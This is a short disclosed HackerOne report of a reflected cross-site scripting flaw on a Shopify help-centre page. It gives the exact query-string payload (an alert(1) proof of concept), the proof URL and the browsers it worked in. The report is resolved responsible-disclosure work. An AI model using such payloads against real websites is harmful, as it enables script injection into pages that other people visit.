help.shopify.com Cross Site Scripting

Disclosed: 2019-05-12 17:36:09 By 3rd4l To shopify
Low
Vulnerability Details
Hello Security Team. Tested windows 10 and edge (Microsoft Edge 44.17763.1.0) , internet explorer Test Url : https://help.shopify.com/it/partners/resources/marketing-pack-for-accountants Payload: ?v0sjx'-alert(1)-'uyvvr=1 Proof Url: <https://help.shopify.com/it/partners/resources/marketing-pack-for-accountants?v0sjx'-alert(1)-'uyvvr=1> Open Url: edge , internet explorer , click me "Condividi il tuo feedback. " ## Impact https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
Actions
View on HackerOne
Report Stats
  • Report ID: 564196
  • State: Closed
  • Substate: resolved
  • Upvotes: 70
Share this report